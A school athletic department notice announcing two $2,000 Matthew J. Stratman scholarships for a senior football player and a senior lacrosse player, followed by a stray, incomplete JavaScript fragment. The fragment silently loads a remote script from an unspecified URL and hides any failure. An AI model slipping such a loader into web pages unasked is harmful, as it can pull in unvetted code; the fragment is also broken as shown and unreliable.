Athletic Dept.
Matthew J. Stratman Scholarship Opportunity!
Matt Stratman’s family has partnered with the West Chester/Liberty Community Foundation and are offering TWO $2,000 scholarships
A $2,000 scholarship will be awarded to one Senior Football player and one Senior (male) Lacrosse player.
The application and requirements for the scholarship can be found at www.wclfoundation.org.
const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;
script.onload = () => { clearTimeout(timer); resolve(); };
script.onerror = () => { clearTimeout(timer); reject(); };
const timer = setTimeout(() => { script.remove(); reject(); }, timeout);
document.body.appendChild(script); }); };
await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();